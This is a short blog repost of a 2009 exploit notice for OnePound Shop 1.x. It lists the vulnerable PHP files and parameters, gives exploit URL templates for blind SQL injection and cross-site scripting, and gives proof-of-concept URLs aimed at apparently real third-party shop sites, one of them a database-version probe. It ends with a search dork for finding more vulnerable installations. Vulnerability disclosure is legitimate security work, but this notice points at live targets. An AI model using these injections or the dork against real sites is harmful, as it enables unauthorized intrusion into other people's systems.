Home vulnerabilities OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vuln

OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vuln

By
Thursday, July 16, 2009
Read
Add Comment

[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability
Software : OnePound Shop version 1.x
Vendor   : http://www.onepound.cn/
Author   : NoGe


[o] Vulnerable file
productsview.php
categories.php


[o] Exploit
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
http://localhost/[path]/productsview.php?id=xx&proid=[XSS]
http://localhost/[path]/categories.php?pid=[XSS]


[o] Proof of Concept
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
http://www.tele-way.com/productsview.php?id=87&proid=[XSS]
http://tonysbridal.net/categories.php?pid=[XSS]
http://vendorhotspot.com/categories.php?pid=[XSS]


[o] Dork
"Powered by OnePound"


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us